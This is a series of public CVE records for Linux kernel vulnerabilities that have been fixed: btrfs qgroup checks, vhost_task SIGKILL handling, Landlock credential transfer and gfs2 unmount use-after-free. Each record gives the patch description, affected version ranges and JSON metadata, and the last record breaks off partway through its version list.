Vulnerability from cvelistv5 – Published: 2024-07-30 07:46 – Updated: 2025-05-04 12:57

Title

btrfs: always do the basic checks for btrfs_qgroup_inherit structure

Summary

In the Linux kernel, the following vulnerability has been resolved: btrfs: always do the basic checks for btrfs_qgroup_inherit structure [BUG] Syzbot reports the following regression detected by KASAN: BUG: KASAN: slab-out-of-bounds in btrfs_qgroup_inherit+0x42e/0x2e20 fs/btrfs/qgroup.c:3277 Read of size 8 at addr ffff88814628ca50 by task syz-executor318/5171 CPU: 0 PID: 5171 Comm: syz-executor318 Not tainted 6.10.0-rc2-syzkaller-00010-g2ab795141095 #0 Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 04/02/2024 Call Trace: <TASK> __dump_stack lib/dump_stack.c:88 [inline] dump_stack_lvl+0x241/0x360 lib/dump_stack.c:114 print_address_description mm/kasan/report.c:377 [inline] print_report+0x169/0x550 mm/kasan/report.c:488 kasan_report+0x143/0x180 mm/kasan/report.c:601 btrfs_qgroup_inherit+0x42e/0x2e20 fs/btrfs/qgroup.c:3277 create_pending_snapshot+0x1359/0x29b0 fs/btrfs/transaction.c:1854 create_pending_snapshots+0x195/0x1d0 fs/btrfs/transaction.c:1922 btrfs_commit_transaction+0xf20/0x3740 fs/btrfs/transaction.c:2382 create_snapshot+0x6a1/0x9e0 fs/btrfs/ioctl.c:875 btrfs_mksubvol+0x58f/0x710 fs/btrfs/ioctl.c:1029 btrfs_mksnapshot+0xb5/0xf0 fs/btrfs/ioctl.c:1075 __btrfs_ioctl_snap_create+0x387/0x4b0 fs/btrfs/ioctl.c:1340 btrfs_ioctl_snap_create_v2+0x1f2/0x3a0 fs/btrfs/ioctl.c:1422 btrfs_ioctl+0x99e/0xc60 vfs_ioctl fs/ioctl.c:51 [inline] __do_sys_ioctl fs/ioctl.c:907 [inline] __se_sys_ioctl+0xfc/0x170 fs/ioctl.c:893 do_syscall_x64 arch/x86/entry/common.c:52 [inline] do_syscall_64+0xf3/0x230 arch/x86/entry/common.c:83 entry_SYSCALL_64_after_hwframe+0x77/0x7f RIP: 0033:0x7fcbf1992509 RSP: 002b:00007fcbf1928218 EFLAGS: 00000246 ORIG_RAX: 0000000000000010 RAX: ffffffffffffffda RBX: 00007fcbf1a1f618 RCX: 00007fcbf1992509 RDX: 0000000020000280 RSI: 0000000050009417 RDI: 0000000000000003 RBP: 00007fcbf1a1f610 R08: 00007ffea1298e97 R09: 0000000000000000 R10: 0000000000000000 R11: 0000000000000246 R12: 00007fcbf19eb660 R13: 00000000200002b8 R14: 00007fcbf19e60c0 R15: 0030656c69662f2e </TASK> And it also pinned it down to commit b5357cb268c4 ("btrfs: qgroup: do not check qgroup inherit if qgroup is disabled"). [CAUSE] That offending commit skips the whole qgroup inherit check if qgroup is not enabled. But that also skips the very basic checks like num_ref_copies/num_excl_copies and the structure size checks. Meaning if a qgroup enable/disable race is happening at the background, and we pass a btrfs_qgroup_inherit structure when the qgroup is disabled, the check would be completely skipped. Then at the time of transaction commitment, qgroup is re-enabled and btrfs_qgroup_inherit() is going to use the incorrect structure and causing the above KASAN error. [FIX] Make btrfs_qgroup_check_inherit() only skip the source qgroup checks. So that even if invalid btrfs_qgroup_inherit structure is passed in, we can still reject invalid ones no matter if qgroup is enabled or not. Furthermore we do already have an extra safety inside btrfs_qgroup_inherit(), which would just ignore invalid qgroup sources, so even if we only skip the qgroup source check we're still safe.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/ebe5ea02577b2c527…
	https://git.kernel.org/stable/c/724d8042cef84496d…

Impacted products

Vendor

Product

Version

Linux

Affected: b5357cb268c41b4e2b7383d2759fc562f5b58c33 , < ebe5ea02577b2c527958af1b76ac472c7ab53a56 (git)
Affected: b5357cb268c41b4e2b7383d2759fc562f5b58c33 , < 724d8042cef84496ddb4492dc120291f997ae26b (git)
Affected: c839f73a70f312f477225b64020364e108f08231 (git)

Linux

Affected: 6.9
Unaffected: 0 , < 6.9 (semver)
Unaffected: 6.9.9 , ≤ 6.9.* (semver)
Unaffected: 6.10 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T04:54:32.553Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/ebe5ea02577b2c527958af1b76ac472c7ab53a56"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/724d8042cef84496ddb4492dc120291f997ae26b"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-42111",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-10T16:17:29.663997Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-11T17:33:06.663Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "fs/btrfs/qgroup.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "ebe5ea02577b2c527958af1b76ac472c7ab53a56",
              "status": "affected",
              "version": "b5357cb268c41b4e2b7383d2759fc562f5b58c33",
              "versionType": "git"
            },
            {
              "lessThan": "724d8042cef84496ddb4492dc120291f997ae26b",
              "status": "affected",
              "version": "b5357cb268c41b4e2b7383d2759fc562f5b58c33",
              "versionType": "git"
            },
            {
              "status": "affected",
              "version": "c839f73a70f312f477225b64020364e108f08231",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "fs/btrfs/qgroup.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "6.9"
            },
            {
              "lessThan": "6.9",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.9.*",
              "status": "unaffected",
              "version": "6.9.9",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.10",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9.9",
                  "versionStartIncluding": "6.9",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.10",
                  "versionStartIncluding": "6.9",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionStartIncluding": "6.8.10",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nbtrfs: always do the basic checks for btrfs_qgroup_inherit structure\n\n[BUG]\nSyzbot reports the following regression detected by KASAN:\n\n  BUG: KASAN: slab-out-of-bounds in btrfs_qgroup_inherit+0x42e/0x2e20 fs/btrfs/qgroup.c:3277\n  Read of size 8 at addr ffff88814628ca50 by task syz-executor318/5171\n\n  CPU: 0 PID: 5171 Comm: syz-executor318 Not tainted 6.10.0-rc2-syzkaller-00010-g2ab795141095 #0\n  Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 04/02/2024\n  Call Trace:\n   \u003cTASK\u003e\n   __dump_stack lib/dump_stack.c:88 [inline]\n   dump_stack_lvl+0x241/0x360 lib/dump_stack.c:114\n   print_address_description mm/kasan/report.c:377 [inline]\n   print_report+0x169/0x550 mm/kasan/report.c:488\n   kasan_report+0x143/0x180 mm/kasan/report.c:601\n   btrfs_qgroup_inherit+0x42e/0x2e20 fs/btrfs/qgroup.c:3277\n   create_pending_snapshot+0x1359/0x29b0 fs/btrfs/transaction.c:1854\n   create_pending_snapshots+0x195/0x1d0 fs/btrfs/transaction.c:1922\n   btrfs_commit_transaction+0xf20/0x3740 fs/btrfs/transaction.c:2382\n   create_snapshot+0x6a1/0x9e0 fs/btrfs/ioctl.c:875\n   btrfs_mksubvol+0x58f/0x710 fs/btrfs/ioctl.c:1029\n   btrfs_mksnapshot+0xb5/0xf0 fs/btrfs/ioctl.c:1075\n   __btrfs_ioctl_snap_create+0x387/0x4b0 fs/btrfs/ioctl.c:1340\n   btrfs_ioctl_snap_create_v2+0x1f2/0x3a0 fs/btrfs/ioctl.c:1422\n   btrfs_ioctl+0x99e/0xc60\n   vfs_ioctl fs/ioctl.c:51 [inline]\n   __do_sys_ioctl fs/ioctl.c:907 [inline]\n   __se_sys_ioctl+0xfc/0x170 fs/ioctl.c:893\n   do_syscall_x64 arch/x86/entry/common.c:52 [inline]\n   do_syscall_64+0xf3/0x230 arch/x86/entry/common.c:83\n   entry_SYSCALL_64_after_hwframe+0x77/0x7f\n  RIP: 0033:0x7fcbf1992509\n  RSP: 002b:00007fcbf1928218 EFLAGS: 00000246 ORIG_RAX: 0000000000000010\n  RAX: ffffffffffffffda RBX: 00007fcbf1a1f618 RCX: 00007fcbf1992509\n  RDX: 0000000020000280 RSI: 0000000050009417 RDI: 0000000000000003\n  RBP: 00007fcbf1a1f610 R08: 00007ffea1298e97 R09: 0000000000000000\n  R10: 0000000000000000 R11: 0000000000000246 R12: 00007fcbf19eb660\n  R13: 00000000200002b8 R14: 00007fcbf19e60c0 R15: 0030656c69662f2e\n   \u003c/TASK\u003e\n\nAnd it also pinned it down to commit b5357cb268c4 (\"btrfs: qgroup: do not\ncheck qgroup inherit if qgroup is disabled\").\n\n[CAUSE]\nThat offending commit skips the whole qgroup inherit check if qgroup is\nnot enabled.\n\nBut that also skips the very basic checks like\nnum_ref_copies/num_excl_copies and the structure size checks.\n\nMeaning if a qgroup enable/disable race is happening at the background,\nand we pass a btrfs_qgroup_inherit structure when the qgroup is\ndisabled, the check would be completely skipped.\n\nThen at the time of transaction commitment, qgroup is re-enabled and\nbtrfs_qgroup_inherit() is going to use the incorrect structure and\ncausing the above KASAN error.\n\n[FIX]\nMake btrfs_qgroup_check_inherit() only skip the source qgroup checks.\nSo that even if invalid btrfs_qgroup_inherit structure is passed in, we\ncan still reject invalid ones no matter if qgroup is enabled or not.\n\nFurthermore we do already have an extra safety inside\nbtrfs_qgroup_inherit(), which would just ignore invalid qgroup sources,\nso even if we only skip the qgroup source check we\u0027re still safe."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T12:57:40.209Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/ebe5ea02577b2c527958af1b76ac472c7ab53a56"
        },
        {
          "url": "https://git.kernel.org/stable/c/724d8042cef84496ddb4492dc120291f997ae26b"
        }
      ],
      "title": "btrfs: always do the basic checks for btrfs_qgroup_inherit structure",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-42111",
    "datePublished": "2024-07-30T07:46:05.570Z",
    "dateReserved": "2024-07-29T15:50:41.176Z",
    "dateUpdated": "2025-05-04T12:57:40.209Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2024-42135 (GCVE-0-2024-42135)

Vulnerability from cvelistv5 – Published: 2024-07-30 07:46 – Updated: 2026-01-05 10:51

Title

vhost_task: Handle SIGKILL by flushing work and exiting

Summary

In the Linux kernel, the following vulnerability has been resolved: vhost_task: Handle SIGKILL by flushing work and exiting Instead of lingering until the device is closed, this has us handle SIGKILL by: 1. marking the worker as killed so we no longer try to use it with new virtqueues and new flush operations. 2. setting the virtqueue to worker mapping so no new works are queued. 3. running all the exiting works.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/abe067dc3a662eef7…
	https://git.kernel.org/stable/c/dec987fe2df670827…
	https://git.kernel.org/stable/c/db5247d9bf5c6ade9…

Impacted products

Vendor

Product

Version

Linux

Affected: f9010dbdce911ee1f1af1398a24b1f9f992e0080 , < abe067dc3a662eef7d5cddbbc41ed50a0b68b0af (git)
Affected: f9010dbdce911ee1f1af1398a24b1f9f992e0080 , < dec987fe2df670827eb53b97c9552ed8dfc63ad4 (git)
Affected: f9010dbdce911ee1f1af1398a24b1f9f992e0080 , < db5247d9bf5c6ade9fd70b4e4897441e0269b233 (git)

Linux

Affected: 6.4
Unaffected: 0 , < 6.4 (semver)
Unaffected: 6.6.39 , ≤ 6.6.* (semver)
Unaffected: 6.9.9 , ≤ 6.9.* (semver)
Unaffected: 6.10 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T04:54:32.448Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/abe067dc3a662eef7d5cddbbc41ed50a0b68b0af"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/dec987fe2df670827eb53b97c9552ed8dfc63ad4"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/db5247d9bf5c6ade9fd70b4e4897441e0269b233"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-42135",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-10T16:16:12.775085Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-11T17:34:36.049Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "drivers/vhost/vhost.c",
            "drivers/vhost/vhost.h",
            "include/linux/sched/vhost_task.h",
            "kernel/vhost_task.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "abe067dc3a662eef7d5cddbbc41ed50a0b68b0af",
              "status": "affected",
              "version": "f9010dbdce911ee1f1af1398a24b1f9f992e0080",
              "versionType": "git"
            },
            {
              "lessThan": "dec987fe2df670827eb53b97c9552ed8dfc63ad4",
              "status": "affected",
              "version": "f9010dbdce911ee1f1af1398a24b1f9f992e0080",
              "versionType": "git"
            },
            {
              "lessThan": "db5247d9bf5c6ade9fd70b4e4897441e0269b233",
              "status": "affected",
              "version": "f9010dbdce911ee1f1af1398a24b1f9f992e0080",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "drivers/vhost/vhost.c",
            "drivers/vhost/vhost.h",
            "include/linux/sched/vhost_task.h",
            "kernel/vhost_task.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "6.4"
            },
            {
              "lessThan": "6.4",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.39",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.9.*",
              "status": "unaffected",
              "version": "6.9.9",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.10",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.39",
                  "versionStartIncluding": "6.4",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9.9",
                  "versionStartIncluding": "6.4",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.10",
                  "versionStartIncluding": "6.4",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nvhost_task: Handle SIGKILL by flushing work and exiting\n\nInstead of lingering until the device is closed, this has us handle\nSIGKILL by:\n\n1. marking the worker as killed so we no longer try to use it with\n   new virtqueues and new flush operations.\n2. setting the virtqueue to worker mapping so no new works are queued.\n3. running all the exiting works."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-01-05T10:51:59.370Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/abe067dc3a662eef7d5cddbbc41ed50a0b68b0af"
        },
        {
          "url": "https://git.kernel.org/stable/c/dec987fe2df670827eb53b97c9552ed8dfc63ad4"
        },
        {
          "url": "https://git.kernel.org/stable/c/db5247d9bf5c6ade9fd70b4e4897441e0269b233"
        }
      ],
      "title": "vhost_task: Handle SIGKILL by flushing work and exiting",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-42135",
    "datePublished": "2024-07-30T07:46:30.271Z",
    "dateReserved": "2024-07-29T15:50:41.187Z",
    "dateUpdated": "2026-01-05T10:51:59.370Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2024-42318 (GCVE-0-2024-42318)

Vulnerability from cvelistv5 – Published: 2024-08-17 09:09 – Updated: 2025-11-03 22:04

Title

landlock: Don't lose track of restrictions on cred_transfer

Summary

In the Linux kernel, the following vulnerability has been resolved: landlock: Don't lose track of restrictions on cred_transfer When a process' cred struct is replaced, this _almost_ always invokes the cred_prepare LSM hook; but in one special case (when KEYCTL_SESSION_TO_PARENT updates the parent's credentials), the cred_transfer LSM hook is used instead. Landlock only implements the cred_prepare hook, not cred_transfer, so KEYCTL_SESSION_TO_PARENT causes all information on Landlock restrictions to be lost. This basically means that a process with the ability to use the fork() and keyctl() syscalls can get rid of all Landlock restrictions on itself. Fix it by adding a cred_transfer hook that does the same thing as the existing cred_prepare hook. (Implemented by having hook_cred_prepare() call hook_cred_transfer() so that the two functions are less likely to accidentally diverge in the future.)

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/916c648323fa53b89…
	https://git.kernel.org/stable/c/0d74fd54db0bd0c0c…
	https://git.kernel.org/stable/c/16896914bace82d78…
	https://git.kernel.org/stable/c/b14cc2cf313bd2905…
	https://git.kernel.org/stable/c/39705a6c29f8a2b93…
	https://lore.kernel.org/all/20240817.shahka3Ee1iy…
	https://www.openwall.com/lists/oss-security/2024/…
	https://bugs.chromium.org/p/project-zero/issues/d…

Impacted products

Vendor

Product

Version

Linux

Affected: 385975dca53eb41031d0cbd1de318eb1bc5d6bb9 , < 916c648323fa53b89eedb34a0988ddaf01406117 (git)
Affected: 385975dca53eb41031d0cbd1de318eb1bc5d6bb9 , < 0d74fd54db0bd0c0c224bef0da8fc95ea9c9f36c (git)
Affected: 385975dca53eb41031d0cbd1de318eb1bc5d6bb9 , < 16896914bace82d7811c62f3b6d5320132384f49 (git)
Affected: 385975dca53eb41031d0cbd1de318eb1bc5d6bb9 , < b14cc2cf313bd29056fadbc8ecd7f957cf5791ff (git)
Affected: 385975dca53eb41031d0cbd1de318eb1bc5d6bb9 , < 39705a6c29f8a2b93cf5b99528a55366c50014d1 (git)

Linux

Affected: 5.13
Unaffected: 0 , < 5.13 (semver)
Unaffected: 5.15.165 , ≤ 5.15.* (semver)
Unaffected: 6.1.103 , ≤ 6.1.* (semver)
Unaffected: 6.6.44 , ≤ 6.6.* (semver)
Unaffected: 6.10.3 , ≤ 6.10.* (semver)
Unaffected: 6.11 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2025-11-03T22:04:37.227Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "url": "http://www.openwall.com/lists/oss-security/2024/08/17/2"
          },
          {
            "url": "https://lists.debian.org/debian-lts-announce/2025/01/msg00001.html"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-42318",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-10T16:09:35.795087Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-12T17:33:26.227Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "security/landlock/cred.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "916c648323fa53b89eedb34a0988ddaf01406117",
              "status": "affected",
              "version": "385975dca53eb41031d0cbd1de318eb1bc5d6bb9",
              "versionType": "git"
            },
            {
              "lessThan": "0d74fd54db0bd0c0c224bef0da8fc95ea9c9f36c",
              "status": "affected",
              "version": "385975dca53eb41031d0cbd1de318eb1bc5d6bb9",
              "versionType": "git"
            },
            {
              "lessThan": "16896914bace82d7811c62f3b6d5320132384f49",
              "status": "affected",
              "version": "385975dca53eb41031d0cbd1de318eb1bc5d6bb9",
              "versionType": "git"
            },
            {
              "lessThan": "b14cc2cf313bd29056fadbc8ecd7f957cf5791ff",
              "status": "affected",
              "version": "385975dca53eb41031d0cbd1de318eb1bc5d6bb9",
              "versionType": "git"
            },
            {
              "lessThan": "39705a6c29f8a2b93cf5b99528a55366c50014d1",
              "status": "affected",
              "version": "385975dca53eb41031d0cbd1de318eb1bc5d6bb9",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "security/landlock/cred.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "5.13"
            },
            {
              "lessThan": "5.13",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.165",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.103",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.44",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.10.*",
              "status": "unaffected",
              "version": "6.10.3",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.11",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.165",
                  "versionStartIncluding": "5.13",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.103",
                  "versionStartIncluding": "5.13",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.44",
                  "versionStartIncluding": "5.13",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.10.3",
                  "versionStartIncluding": "5.13",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.11",
                  "versionStartIncluding": "5.13",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nlandlock: Don\u0027t lose track of restrictions on cred_transfer\n\nWhen a process\u0027 cred struct is replaced, this _almost_ always invokes\nthe cred_prepare LSM hook; but in one special case (when\nKEYCTL_SESSION_TO_PARENT updates the parent\u0027s credentials), the\ncred_transfer LSM hook is used instead.  Landlock only implements the\ncred_prepare hook, not cred_transfer, so KEYCTL_SESSION_TO_PARENT causes\nall information on Landlock restrictions to be lost.\n\nThis basically means that a process with the ability to use the fork()\nand keyctl() syscalls can get rid of all Landlock restrictions on\nitself.\n\nFix it by adding a cred_transfer hook that does the same thing as the\nexisting cred_prepare hook. (Implemented by having hook_cred_prepare()\ncall hook_cred_transfer() so that the two functions are less likely to\naccidentally diverge in the future.)"
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T09:26:39.182Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/916c648323fa53b89eedb34a0988ddaf01406117"
        },
        {
          "url": "https://git.kernel.org/stable/c/0d74fd54db0bd0c0c224bef0da8fc95ea9c9f36c"
        },
        {
          "url": "https://git.kernel.org/stable/c/16896914bace82d7811c62f3b6d5320132384f49"
        },
        {
          "url": "https://git.kernel.org/stable/c/b14cc2cf313bd29056fadbc8ecd7f957cf5791ff"
        },
        {
          "url": "https://git.kernel.org/stable/c/39705a6c29f8a2b93cf5b99528a55366c50014d1"
        },
        {
          "url": "https://lore.kernel.org/all/20240817.shahka3Ee1iy@digikod.net/"
        },
        {
          "url": "https://www.openwall.com/lists/oss-security/2024/08/17/2"
        },
        {
          "url": "https://bugs.chromium.org/p/project-zero/issues/detail?id=2566"
        }
      ],
      "title": "landlock: Don\u0027t lose track of restrictions on cred_transfer",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-42318",
    "datePublished": "2024-08-17T09:09:31.160Z",
    "dateReserved": "2024-07-30T07:40:12.278Z",
    "dateUpdated": "2025-11-03T22:04:37.227Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2024-38570 (GCVE-0-2024-38570)

Vulnerability from cvelistv5 – Published: 2024-06-19 13:35 – Updated: 2025-05-04 09:14

Title

gfs2: Fix potential glock use-after-free on unmount

Summary

In the Linux kernel, the following vulnerability has been resolved: gfs2: Fix potential glock use-after-free on unmount When a DLM lockspace is released and there ares still locks in that lockspace, DLM will unlock those locks automatically. Commit fb6791d100d1b started exploiting this behavior to speed up filesystem unmount: gfs2 would simply free glocks it didn't want to unlock and then release the lockspace. This didn't take the bast callbacks for asynchronous lock contention notifications into account, which remain active until until a lock is unlocked or its lockspace is released. To prevent those callbacks from accessing deallocated objects, put the glocks that should not be unlocked on the sd_dead_glocks list, release the lockspace, and only then free those glocks. As an additional measure, ignore unexpected ast and bast callbacks if the receiving glock is dead.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/0636b34b44589b142…
	https://git.kernel.org/stable/c/e42e8a24d7f02d287…
	https://git.kernel.org/stable/c/501cd8fabf621d10b…
	https://git.kernel.org/stable/c/d98779e687726d8f8…

Impacted products

Vendor

Product

Version

Linux

Affected: fb6791d100d1bba20b5cdbc4912e1f7086ec60f8 , < 0636b34b44589b142700ac137b5f69802cfe2e37 (git)
Affected: fb6791d100d1bba20b5cdbc4912e1f7086ec60f8 , < e42e8a24d7f02d28763d16ca7ec5fc6d1f142af0 (git)
Affected: fb6791d100d1bba20b5cdbc4912e1f7086ec60f8 , < 501cd8fabf621d10bd4893e37f6ce6c20523c8ca (git)
